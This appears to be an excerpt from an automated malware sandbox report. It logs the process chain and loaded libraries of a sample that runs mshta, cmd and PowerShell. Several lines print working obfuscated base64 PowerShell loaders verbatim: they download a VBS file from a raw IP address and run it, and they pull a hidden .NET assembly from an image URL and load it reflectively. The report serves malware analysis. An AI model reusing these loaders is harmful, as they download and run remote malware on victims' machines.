'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispiculeJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC91.tmp" "c:\Users\user\AppData\Local\Temp\5djzgayy\CSC760185DBFBB46BF8363AB3E3456F7D3.TMP"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
